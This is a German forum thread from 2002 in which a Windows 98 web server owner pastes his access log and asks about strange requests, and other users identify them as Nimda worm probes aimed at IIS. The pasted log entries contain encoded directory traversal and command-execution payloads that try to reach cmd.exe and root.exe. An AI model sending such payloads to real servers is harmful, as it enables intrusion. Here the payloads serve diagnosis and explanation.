-vudman- Geschrieben 7. Mai 2002 Geschrieben 7. Mai 2002 Guten Abend seit kurzer Zeit zeigt mir mein Webserver - OmniHTTPd 2.09 unter Windows 98SE - Log-Einträge wie diese: 217.185.99.183 localhost - [06/May/2002:18:11:20 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 401 "" "" Error reading "D:\HTTPD\HTDOCS\scripts\root.exe" - Der angegebene Pfad wurde nicht gefunden. 217.215.78.70 localhost - [06/May/2002:18:02:11 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 401 "" "" Error reading "D:\HTTPD\HTDOCS\scripts\..%2f..\winnt\system32\cmd.exe" - Der angegebene Pfad wurde nicht gefunden. 217.215.78.70 localhost - [06/May/2002:18:02:11 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 401 "" "" Error reading "D:\HTTPD\HTDOCS\scripts\..%5c..\winnt\system32\cmd.exe" - Der angegebene Pfad wurde nicht gefunden. 217.215.78.70 localhost - [06/May/2002:18:02:10 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 401 "" "" Error reading "D:\HTTPD\HTDOCS\scripts\..S5c..\winnt\system32\cmd.exe" - Der angegebene Pfad wurde nicht gefunden. 217.215.78.70 localhost - [06/May/2002:18:02:10 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 401 "" "" Error reading "D:\HTTPD\HTDOCS\scripts\..S5c..\winnt\system32\cmd.exe" - Der angegebene Pfad wurde nicht gefunden. 217.215.78.70 localhost - [06/May/2002:18:02:10 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 401 "" "" Error reading "D:\HTTPD\HTDOCS\scripts\..ÃÅ“..\winnt\system32\cmd.exe" - Der angegebene Pfad wurde nicht gefunden. 217.215.78.70 localhost - [06/May/2002:18:02:09 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 401 "" "" Error reading "D:\HTTPD\HTDOCS\scripts\..À¯..\winnt\system32\cmd.exe" - Der angegebene Pfad wurde nicht gefunden. 217.215.78.70 localhost - [06/May/2002:18:02:09 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 401 "" "" Error reading "D:\HTTPD\HTDOCS\scripts\winnt\system32\cmd.exe" - Der angegebene Pfad wurde nicht gefunden. 217.215.78.70 localhost - [06/May/2002:18:02:09 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 500 412 "" "" Error reading "D:\HTTPD\HTDOCS\scripts\..Ã..\winnt\system32\cmd.exe" - Die Pfadangabe ist ungültig. 217.215.78.70 localhost - [06/May/2002:18:02:09 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 500 412 "" "" Error reading "D:\HTTPD\HTDOCS\msadc\..%5c..\..%5c..\..%5c\..Ã..\..Ã..\..Ã..\winnt\system32\cmd.exe" - Die Pfadangabe ist ungültig. 217.215.78.70 localhost - [06/May/2002:18:02:08 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 401 "" "" Error reading "D:\HTTPD\HTDOCS\_mem_bin\..%5c..\..%5c..\..%5c..\winnt\system32\cmd.exe" - Der angegebene Pfad wurde nicht gefunden. 217.215.78.70 localhost - [06/May/2002:18:02:08 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 401 "" "" Error reading "D:\HTTPD\HTDOCS\_vti_bin\..%5c..\..%5c..\..%5c..\winnt\system32\cmd.exe" - Der angegebene Pfad wurde nicht gefunden. 217.215.78.70 localhost - [06/May/2002:18:02:08 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 401 "" "" Error reading "D:\HTTPD\HTDOCS\scripts\..%5c..\winnt\system32\cmd.exe" - Der angegebene Pfad wurde nicht gefunden. 217.215.78.70 localhost - [06/May/2002:18:02:07 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 401 "" "" Error reading "D:\HTTPD\HTDOCS\d\winnt\system32\cmd.exe" - Der angegebene Pfad wurde nicht gefunden. 217.215.78.70 localhost - [06/May/2002:18:02:07 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 401 "" "" Error reading "D:\HTTPD\HTDOCS\c\winnt\system32\cmd.exe" - Der angegebene Pfad wurde nicht gefunden. 217.215.78.70 localhost - [06/May/2002:18:02:07 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 401 "" "" Error reading "D:\HTTPD\HTDOCS\MSADC\root.exe" - Der angegebene Pfad wurde nicht gefunden. 217.215.78.70 localhost - [06/May/2002:18:02:07 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 401 "" "" Error reading "D:\HTTPD\HTDOCS\scripts\root.exe" - Der angegebene Pfad wurde nicht gefunden. Meine eigene IP ist das garantiert nicht (ein Traceroute auf die IP brachte einen Host mit .se am Ende). Was mir bei der Sache recht spanisch vorkommt, ist, dass der Hacker (?) versucht, erst auf die nicht vorhandene root.exe zuzugreifen, danach versucht, auf die ebenfalls nicht vorhandene cmd.exe zuzugreifen, und dies in sehr schnellen Abständen macht. Hätte ich Windows 2000, könnte das ja CodeRed/Nimda sein, aber ich hab' Windows 98 ... ich habe gestern den Webserver von Port 80 auf Port 1337 gestellt, seitdem ist Ruhe, eine Virensuche mit der aktuellsten Version von AntiVir brachte keine Ergebnisse/Virenfunde. Was könnte das sein? tia & bye, vudman Zitieren
nic_power Geschrieben 8. Mai 2002 Geschrieben 8. Mai 2002 Original geschrieben von -vudman- Guten Abend Hätte ich Windows 2000, könnte das ja CodeRed/Nimda sein, aber ich hab' Windows 98 ... ich habe gestern den Webserver von Port 80 auf Port 1337 gestellt, seitdem ist Ruhe, eine Virensuche mit der aktuellsten Version von AntiVir brachte keine Ergebnisse/Virenfunde. Was könnte das sein? tia & bye, vudman Das ist das typischen Angriffsmuster von Nimda. Dieser Wurm versucht von aussen ueber eine Bug im Microsoft IIS Web server in Deinen Rechner einzudringen. Der "Hacker" weiss wahrscheinlich gar nicht, dass eine seiner Maschinen infiziert ist und versucht bei Dir ins System zu kommen. Viel machen kannst Du da nicht (den Port hast Du ja schon geaendert). Eventuell koenntest Du dem Systemandiministrator des infizierten Systems benachrichtigen (.se ist Schweden). Das die Virensuche nichts findet ist klar, da der Virus bei Dir noch nicht im System ist. Zitieren
DanielB Geschrieben 8. Mai 2002 Geschrieben 8. Mai 2002 Solange du keinen MS IIS mit bekannter Sicherheitslücke verwendest, gibt es keinen Grund sich sorgen zu machen. Wie nic schon sagte, weiss die Person, von der diese Anfragen ausgehen vermutlich gar nicht, dass sein Rechner infiziert ist. Desweiteren ist dieser "Angriff" zu 99.9% nichteinmal gezielt gegen deinen PC gerichtet. Erinnert mich irgendwie an mein Apache Log vor einigen Monaten mit < 170k dieser Einträge Zitieren
-vudman- Geschrieben 8. Mai 2002 Autor Geschrieben 8. Mai 2002 Hi, vielen Dank für eure Antworten Dachte wirklich, dort würde jemand absichtlich versuchen mich zu hacken, aber wenn dem nicht so ist, freut mich das doch mal :] Nochmals thx & bye, vudman Zitieren
Laura.T Geschrieben 8. Mai 2002 Geschrieben 8. Mai 2002 Original geschrieben von n's ...wäre spanisch nicht .es? :OD Danke Laura für Deinen geistreichen Kommentar! TschiTschi Zitieren
Florum Geschrieben 15. Mai 2002 Geschrieben 15. Mai 2002 hehe, die gleiche erfahrung mit diesem virus habe ich vor ca. 2 monaten auch gemacht! dachte damals auch das ich von irgendeinem kerl gehackt werde! naja, seitdem die kiste unter slackware läuft und ein vernünftiger apache drauf ist, ist mir das relativ egoool! greets florum Zitieren
aYre0n Geschrieben 17. Mai 2002 Geschrieben 17. Mai 2002 Hm wieso hat der Coder von dem Wurm net eine Abfrage eingebaut ob es sich bei dem Webserver um einen IIS handelt? hmmm naja egal. Fakt is das viele IIS noch diesen Bug haben.... Zitieren
nic_power Geschrieben 17. Mai 2002 Geschrieben 17. Mai 2002 Wahrscheinlich geht er davon aus, dass alle Web-Server dieser Welt IIS sind . Nic Zitieren
DonMaro Geschrieben 23. Mai 2002 Geschrieben 23. Mai 2002 Original geschrieben von nic_power Wahrscheinlich geht er davon aus, dass alle Web-Server dieser Welt IIS sind . Nic Wie man an der Verbreitungsgeschwindigkeit gesehen hat, hat er damit zu 95% auch recht gehabt... warum also unnötig was proggen ? Ihn störts ja auch nicht, wenn auch andere angegriffen werden... Zitieren
Empfohlene Beiträge
Dein Kommentar
Du kannst jetzt schreiben und Dich später registrieren. Wenn Du ein Konto hast, melde Dich jetzt an, um unter Deinem Benutzernamen zu schreiben.